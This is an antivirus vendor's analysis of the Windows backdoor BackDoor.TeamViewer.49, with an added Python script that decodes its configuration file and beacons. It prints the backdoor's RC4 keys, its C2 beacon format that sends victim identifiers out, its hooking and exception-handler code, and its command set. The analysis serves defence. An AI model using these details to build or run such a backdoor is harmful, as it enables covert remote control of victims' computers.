BackDoor.TeamViewer.49

Added to the Dr.Web virus database: 2016-05-06

Virus description added:

SHA1:

  • 9649ef7b594794daaf02da08c3b95a9f2f71149b (avicap32.dll)
  • 4884d44e2b4c2e2a65472068ef748f51385b13de (payload)

A Trojan for Microsoft Windows that is spread by Trojan.MulDrop6.39120. The Trojan's main payload is incorporated into the avicap32.dll library. Trojan.MulDrop6.39120 runs TeamViewer, which automatically loads the library into the process's memory. The malicious library actively uses the strings, imports, and functions of the TeamViewer process. The most critical parts of the Trojan's code are base64-encoded and RC4-encrypted.

When running, the Trojan removes the TeamViewer icon from the Windows notification area and disables error reporting. BackDoor.TeamViewer.49 also hooks several system functions to hide the TeamViewer window.

The Trojan reads the value of the HKLM\Software\Microsoft\Cryptography\MachineGUID registry parameter and computes its MD5 hash. The result serves both as the local RC4 key and as the name of the mutex used to control re-launching of the Trojan. In addition, the backdoor generates a global RC4 key using one of TeamViewer's functions.

BackDoor.TeamViewer.49 uses a configuration file named nv8moxflu located in the same directory as the Trojan itself. The first byte of the configuration file is a flag that selects the encryption key: if the byte equals 1, the global key is used; if it is 0, the local one. The rest of the file is RC4-encrypted. The configuration file of the examined sample looks as follows:

Section {Main}
       szsubKey "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
       szvalueName "5s"
       szpgkey "rtpredimpku0hrq1le0d4cwqw7pcl97dv"
       szadminkey "i9igmhtliih115b5xlbpcwwc17qlbhse4"
SectionEnd

To decrypt further code blocks, the backdoor uses the MD5 hash of the “szadminkey” parameter value. It then parses the “Main” section of the configuration file, retrieves all parameters, and replaces the original file with a copy encrypted with the local key.

The Trojan launches a separate thread that, in an infinite loop at fixed intervals, sets the “hidden” and “system” attributes on the folder containing its executable file, the malicious library and the configuration file. If it fails to set these attributes, the Trojan starts removing all TeamViewer keys from the system registry:

HKCU\Software\TeamViewer\Version6\MachineFallback
HKCU\Software\TeamViewer\Version6
HKCU\Software\TeamViewer

The backdoor registers itself in autorun by intercepting calls with its hookRegOpenKeyExW function.

It then installs a Vectored Exception Handler and sets breakpoints (0xCC) at the address 0x5A7A84 and at the MessageBoxW function.

To handle the exception codes 0xC0000005 (STATUS_ACCESS_VIOLATION), 0xC0000374 (STATUS_HEAP_CORRUPTION), and 0x80000004 (STATUS_SINGLE_STEP), the following code is executed inside the handler:

ContextRecord->SegDs = 35;            // 0x23: the user-mode data segment selector
ContextRecord->EFlags |= 0x100u;      // set the Trap Flag (TF) to single-step the next instruction
return EXCEPTION_CONTINUE_EXECUTION;  // resume the thread with the modified context

To handle 0x80000003 (STATUS_BREAKPOINT), the Trojan first checks the address at which the exception occurred. If the address is 0x5A7A84, the function call is redirected to the address that TeamViewer uses to call WinVerifyTrust (a dynamically obtained import); the interception always returns “1”, meaning “the signature is invalid”. The Trojan also checks whether the exception address coincides with the MessageBoxW function address. If it does, the backdoor replaces the value of the EIP register with the address of its LoadEmbLib function and leaves the exception handler.

The Trojan's body contains one more encrypted library, responsible for the malicious activity. It is written in C++ using the boost library. The additional library is decrypted with RC4 using a key obtained from the szpgkey parameter of the configuration file, and is then loaded into memory.

This library contains a specially generated array holding the server names. The names are stored byte by byte and are XOR-encrypted with the byte 0x18.

When connecting, the backdoor uses the following User-Agent:

Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

The following line is generated:

client_id=%.8x&connected=0&server_port=0&debug=0

where client_id is the serial number of the hard drive holding the C: volume, XORed with the SID.

This line is RC4-encrypted with the key “heyfg645fdhwi” and then hex-encoded (bintohex). The result is sent to the server in the following request:

http://<cnc>/analytics.php?c=<encoded_data>

The server's reply is likewise hex-encoded and RC4-encrypted.
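The two RC4-protected artefacts described above (the nv8moxflu configuration file with its key-selector byte, and the hex-encoded analytics.php beacon) can be decoded for analysis with the following script. It is an added example, not Dr.Web's code; the use of the MD5 hex digest of MachineGUID as the local key, the field layout of the beacon, and all sample data are assumptions constructed here.

```python
import hashlib
from binascii import hexlify, unhexlify
from urllib.parse import parse_qs, urlparse

BEACON_KEY = b"heyfg645fdhwi"  # RC4 key the write-up names for the analytics.php beacon

def rc4(key: bytes, data: bytes) -> bytes:  # plain RC4; the same call encrypts and decrypts
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def local_key(machine_guid: str) -> bytes:
    # Assumption: the MD5 hex digest of MachineGUID is what serves as key and mutex name.
    return hashlib.md5(machine_guid.encode()).hexdigest().encode()

def decrypt_config(blob: bytes, local: bytes, global_key: bytes) -> dict:
    """Byte 0 selects the key (1 = global, 0 = local); the rest is RC4 ciphertext."""
    if blob[0] not in (0, 1):
        raise ValueError(f"unknown key flag {blob[0]}")
    text = rc4(global_key if blob[0] == 1 else local, blob[1:]).decode("ascii")
    params, in_main = {}, False
    for line in text.splitlines():
        line = line.strip()
        if line == "Section {Main}":
            in_main = True
        elif line == "SectionEnd":
            in_main = False
        elif in_main and " " in line:
            name, value = line.split(" ", 1)
            params[name] = value.strip().strip('"')
    return params

def decode_beacon(url: str) -> dict:
    """Recover the plaintext fields of a .../analytics.php?c=<hex> beacon."""
    c = parse_qs(urlparse(url).query)["c"][0]
    plain = rc4(BEACON_KEY, unhexlify(c)).decode("ascii")
    return dict(kv.split("=", 1) for kv in plain.split("&"))

# Constructed sample data (not captured from a real infection):
LOCAL = local_key("{0f0f0f0f-constructed-guid}")
SAMPLE_CONFIG = b"\x00" + rc4(LOCAL, 'Section {Main}\n szvalueName "5s"\n szpgkey "rtpredimpku0hrq1le0d4cwqw7pcl97dv"\nSectionEnd\n'.encode())
SAMPLE_URL = "http://cnc.invalid/analytics.php?c=" + hexlify(rc4(BEACON_KEY, b"client_id=0a1b2c3d&connected=0&server_port=0&debug=0")).decode()
```

On a real case, feed decrypt_config the on-disk nv8moxflu bytes together with the MD5 of the host's MachineGUID, and decode_beacon the URL taken from proxy or web logs.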

The Trojan can execute the following commands received over HTTPS:

  • disconnect: terminate the connection;
  • idle: maintain the connection;
  • updips: update the auth_ip list with the one specified in the received command;
  • connect: connect to the specified host server. The command must carry the following parameters:
    • ip: the host server's IP address;
    • auth_swith: whether to use authorization. If the value is “1”, the Trojan receives the auth_login and auth_pass parameters; if it is “0”, the Trojan receives the auth_ip parameter. Otherwise, the connection is not established.
    • auth_ip: IP authentication;
    • auth_login: login;
    • auth_pass: password.

Other network activity is implemented with boost::asio::stream_socket_service and uses a binary protocol.

The Trojan can execute the following commands received over the binary protocol:

  • Authentication: depending on the auth_swith parameter, the Trojan sends either the auth_ip data or auth_login and auth_pass.
  • Keep-Alive (0x01): maintains the connection to the server.
  • Send Data (0x02): searches the Trojan's body for the signature
    C8 1F 0E 8D 4A 97 06 2A BC B8 3A D0 30 92 2E 59
    and sends the number of bytes specified by the server.
  • Proxy (0x00): redirects traffic from the C&C server to the remote host server specified by the server.


Treatment recommendations

  1. If the operating system can be started (in normal or safe mode), download Dr.Web Security Space and run a full scan of your computer and of all removable media you use. Learn more about Dr.Web Security Space.
  2. If the operating system cannot be started, change your computer's BIOS settings to boot the computer from CD/DVD or a USB stick. Download the Dr.Web® LiveDisk system recovery disk image or the utility for writing Dr.Web® LiveDisk to a USB stick, then prepare the appropriate USB stick. Boot the computer from that stick, run a full scan and cure the detected threats.

Run a full system scan using Dr.Web Antivirus for Mac OS.

Run a full scan of all disk partitions using Dr.Web Antivirus for Linux.

  1. If your mobile device is working normally, download and install Dr.Web for Android on it. Run a full scan and follow the recommendations for neutralising the detected threats.
  2. If the mobile device is locked by a Trojan of the Android.Locker family (a message about a serious violation of the law or a ransom demand is displayed on the mobile device's screen), proceed as follows:
    • start your smartphone or tablet in safe mode (if you do not know how, consult the mobile device's documentation or contact the manufacturer);
    • then download and install Dr.Web for Android on your mobile device, run a full scan and follow the recommendations for neutralising the detected threats;
    • disconnect your device and reconnect it.

Learn more about Dr.Web for Android